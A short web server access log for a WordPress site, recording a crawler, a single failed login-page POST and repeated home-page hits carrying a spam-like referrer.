114.119.145.249 - - [14/Oct/2022:05:06:37 -0700] "GET /wp-content/?C=M%3BO%3DA HTTP/1.1" 200 - "https://www.gatipackers.com/wp-content?C=D%3BO%3DA" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.gatipackers.com"
20.198.105.190 - - [14/Oct/2022:05:39:14 -0700] "POST /wp-login.php HTTP/1.1" 500 5259 "-" "Mozilla/5.0" "gatipackers.com"
89.185.85.245 - - [14/Oct/2022:05:56:57 -0700] "GET / HTTP/1.1" 200 14585 "https://javxxx18.com/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.gatipackers.com"
89.185.85.245 - - [14/Oct/2022:05:56:56 -0700] "GET / HTTP/1.1" 200 14585 "https://javxxx18.com/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.gatipackers.com"
89.185.85.245 - - [14/Oct/2022:05:56:59 -0700] "GET / HTTP/1.1" 200 14585 "https://javxxx18.com/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.gatipackers.com"
